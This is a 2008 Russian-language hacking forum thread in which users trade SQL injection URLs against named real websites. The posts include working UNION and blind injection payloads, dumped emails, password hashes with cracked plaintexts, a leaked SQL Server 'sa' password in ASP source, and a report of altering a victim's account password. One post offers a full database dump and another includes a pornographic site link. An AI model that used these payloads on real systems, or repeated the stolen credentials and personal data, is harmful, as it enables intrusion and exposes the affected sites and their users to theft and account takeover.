ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
23.07.2008, 11:00
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
2 t0ox раскручивай скулю по мере возможности...тут есть еще что показать
http://promtractor.ru.titan.mtw.ru/eng/show_page.php?section=13&id=5+UNION+SELECT+1,2,3,4 ,CONCAT_WS(0x3a,version(),user(),database()),6,7,8 ,9/*
Database Version: 4.0.23-standard
Database name: db_promtractor1
User name: promtractor1@localhost
в БД подобрал только табелку news которая нам ничего не дает
<% err_mess1=0 msg=0 if request.form("Send").Count>0 then name=Trim(replace(Request.Form("name"), "'", "’")) mail=Trim(replace(Request.Form("mail"), "'", "’")) if len(name)=0 or len(mail)=0 then err_mess1=1 else 'connection_string="DRIVER={Microsoft Access Driver (*.mdb)}; DBQ=" & Server.MapPath("database/gbdb.mdb") & ";" Set Conn1 = Server.CreateObject("ADODB.Connection") Conn1.Open "DRIVER=SQL Server;SERVER=SERVER;UID=sa;APP=Microsoft Open Database Connectivity;WSID=server;DATABASE=promtractor;Netw ork=DBMSSOCN;User Id=sa;PASSWORD=kpangen;" if request.Form("r1")="1" then set rc_check=SErver.createObject("ADODB.RECORDSET") rc_check.open "select * from subscribe where mail='"+mail+"'", conn1 if rc_check.eof then rc_check.close conn1.execute("insert into subscribe (name, mail) values ('"+name+"', '"+mail+"')") msg=1 else rc_check.close msg=3 end if else conn1.execute ("delete from subscribe where mail='"+mail+"'") msg=2 end if conn1.close end if end if if err_mess1>0 or msg=0 then %> <% else response.write " " end if %> Subscription to news Your name*:
вот отсюда тоже можно инфу интересную получить
ну а 2-я твоя скуля интересная..не понимаю зачем выкладывать если ее можно раскрутить по полной, правила читать надо
тИЦ: 550
PR: 4
http://metromir.ru/new_countries.php?id=-7+union+select+1,concat_ws(0x3a,user(),version(),d atabase()),3,4,5/*
Database Version: 5.1.22-rc
Database User: ramb@localhost
Database Name: 440
В БД много баз:
09_org_ru
09_stat
440
a440
admin
aff
all_stat
bagel
billibg
bussines
cinema
client
clent_adv
client_pay
com
com2
continium_com_ua
country_ochag
crimia
develop
directory
dmoz
dom4u_stat
dom_metromir_stat
UKR_INFO_PHORUM
Ukraine
http://metromir.ru/new_countries.php?id=-7+UNION+SELECT+1,concat_ws(0x3a,email,password),3, 4,5+FROM+bagel.users+LIMIT+1,1/*
[0]:vosi@i.com.ua:202cb962ac59075b964b07152d234b70 : 123
[1]:cedric@loubet.org:a01610228fe998f515a72dd730294d8 7 : 1212
http://metromir.ru/new_countries.php?id=-7+UNION+SELECT+1,concat_ws(0x3a,login,pw),3,4,5+FR OM+billing.users+LIMIT+1,1/*
administrator:40be4e59b9a2a2b5dffb918c0e86b3d7 : welcome
xpgeek:96f8ab2b2f1a9f5d04a4d586ab656c75
и так далее
так как база большая, я сохранил все в файл , кому интересно поковырятся милости просим
click
всего доброго вам всем.Удачного дня !
Последний раз редактировалось Gorev; 23.07.2008 в 11:07..
|
|
|
23.07.2008, 13:59
|
|
Участник форума
Регистрация: 17.06.2008
Сообщений: 214
Провел на форуме:
964766
Репутация:
228
|
|
Помогите раскрутить:
http://bikemaster.ru/popup_image1.php?pID=-1'union+select+1,concat(user_name,0x3a,user_passwo rd),3,4,5+from+administrators--
Также:
http://bikemaster.ru/popup_image1.php?pID=-1+union+select+1.2.concat(customers_lastname.0x3a. customers_password.0x3a.customers_email_address).4 .5.6.7.8+from+customers--
Не первый день занимаюсь им. Ничего не выходит(
|
|
|
|
23.07.2008, 16:30
|
|
Banned
Регистрация: 19.10.2007
Сообщений: 152
Провел на форуме:
557623
Репутация:
415
|
|
РАЗВРАТНЫЕ ПОРНО ФОТО ГАЛЕРЕИ
http://hardru.net/photo/cat/?cat=428+AND+1%3Cascii(substring((version()),1,1))/*
http://hardru.net/photo/cat/?cat=428+AND+1%3Cascii(substring((user()),1,1))/*
http://hardru.net/photo/cat/?cat=428+AND+1%3Cascii(substring((database()),1,1) )/*
version(): 3.23.56-log
user(): hardru@localhost
database(): hardru_net
|
|
|
|
23.07.2008, 16:58
|
|
Познающий
Регистрация: 05.02.2007
Сообщений: 71
Провел на форуме:
423288
Репутация:
82
|
|
gismeteo.ru
В антибаяне нет, а так не помню было ли (Не ругаем сильно =) )
_http://avia.gismeteo.ru/avia.php?id=26063+union+select+1,2,3,4,5,6,aes_dec rypt(aes_encrypt(concat_ws(0x3a,version(),database (),user()),0x71),0x71)/*
Версия - 4.1.1-alpha-standard
База - search
Пользователь - root@localhost
|
|
|
|
23.07.2008, 17:12
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
2 Snap
http://avia.gismeteo.ru/avia.php?id=26063+UNION+SELECT+CONCAT_WS(0x3a,user ,password),2,3,4,5,6,7+from+mysql.user/*
добавочка..хотя и не интересная
|
|
|
|
23.07.2008, 17:56
|
|
Познающий
Регистрация: 05.02.2007
Сообщений: 71
Провел на форуме:
423288
Репутация:
82
|
|
Еще сайтик с погодой
http://www.hmn.ru
Вывод сволоч отсутствует или я где то ошибку допустил.
Таблица и поля подобранны верно.
_http://www.hmn.ru/index1.php?code=1&nn=-1637+union+select+1,concat_ws(login,char(58),passw ord),3,4,5,6,7,8+from+users/*
|
|
|
|
23.07.2008, 18:06
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
2 Snap ну если вывода нет, тогда юзаем подзапросы..хоты это геморно, но..надо Федя , надо 
Version:4.1.20
User:nobody@localhost
Database:test
а вот и хешики
Max:629cf3f287a256ef09d0fe907ca6f8a6
Max1:098f6bcd4621d373cade4e832627b4f6 : test
roman:6ccd26e0cf9a27d3a42eb62257592789: c1492
Pozd:ce6d9e1dc29e7363f338ca0de2b1d75a: ptd
и так далее и тому подобное..подозреваю что есть еще и табелка с юзверями форума..но это уже другая история
Последний раз редактировалось Gorev; 23.07.2008 в 18:21..
|
|
|
|
23.07.2008, 18:33
|
|
Banned
Регистрация: 19.10.2007
Сообщений: 152
Провел на форуме:
557623
Репутация:
415
|
|
Сообщение от USAkid
Помогите раскрутить:
http://bikemaster.ru/popup_image1.php?pID=-1'union+select+1,concat(user_name,0x3a,user_passwo rd),3,4,5+from+administrators--
Также:
http://bikemaster.ru/popup_image1.php?pID=-1+union+select+1.2.concat(customers_lastname.0x3a. customers_password.0x3a.customers_email_address).4 .5.6.7.8+from+customers--
Не первый день занимаюсь им. Ничего не выходит(
И не выйдет... Там 3-ий мускул стоит, соответственно всякие подзапросы и юнионы идут лесом. Максимум, что сможешь поднять - инфу из той же табы к которой запрос обращается и то, может быть. Собственно, вот какие инъекции там есть:
http://bikemaster.ru/popup_image1.php?pID=3237'
http://www.bikemaster.ru/popup_image2.php?pID=961'
http://www.bikemaster.ru/popup_image3.php?pID=961'
http://www.bikemaster.ru/popup_image4.php?pID=961'
http://www.bikemaster.ru/popup_image5.php?pID=961'
http://www.bikemaster.ru/popup_image6.php?pID=961'
http://www.bikemaster.ru/default.php?currency=EUR'
http://www.bikemaster.ru/product_vs.php
Я работал с этой:
http://www.bikemaster.ru/default.php?currency=EUR'+and+1/*
http://www.bikemaster.ru/default.php?currency=EUR'+and+1%3Cascii(substring( (version()),1,1))/*
version(): 3.23.58
Если сильно надо - можешь там покопаться, а так - забей лучше...
|
|
|
|
23.07.2008, 19:10
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
пример того как умные програмеры хотят обмануть нас смертных что их сайт на хтмл
Constantine: mod_rewrite тебе ни о чем не говорит?
http://www.level.ro/stiri/2753+UNION+SELECT+AES_DECRYPT(AES_ENCRYPT(CONCAT_W S(0x3a,Version(),Database(),User()),0x71),0x71),2/*/tekken_6.html
Database Version: 4.1.21-standard
Database name: level_nou
User name: level@localhost
подобрал табелку user но колонки так и не смог 
http://autohit.ro/compare.php?modelId1=106+AND+ASCII(SUBSTRING((curr ent_database()),6,1))=xxx--
current_database() : autohit_ro
current_user() : autohit
version(): PostgreSQL
вывода нет, о можно побрутить сиптом, главное запрос правильно составить
не забывайте что тут есть Information_Schema или PG_TABLES
ну и конечно не забывайте что в
PostgreSQL оператор LIMIT сосоит из двух частей: LIMIT и OFFSET
табелки брутить не стал, оставляю это удовольствие вам
Последний раз редактировалось Constantine; 24.07.2008 в 01:23..
|
|
|
|
23.07.2008, 23:45
|
|
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497
Репутация:
303
|
|
http://www.2goroda.ru/
http://www.2goroda.ru/News/newsfp.php?n=-1+union+select+1,2,3,4,concat(username,0x3a,user_p assword)%20,6,7,8+from+phpbb_users+limit+4,10/*
Выискиваем: user:magnum pass:6666
меняем пас юзеру Master на 'anus'
Вроде как админка по адресу http://www.2goroda.ru/Poll/admin/index.php
Но таблу так и не подобрал на это дело.
Зы: Впервые вижу такого дибила, который на пасворд '6666' ставит =)
|
|
|
|
|
|
|
|
Здесь присутствуют: 5 (пользователей: 0 , гостей: 5)
|
|
|
|
Похожие темы
Линейный вид
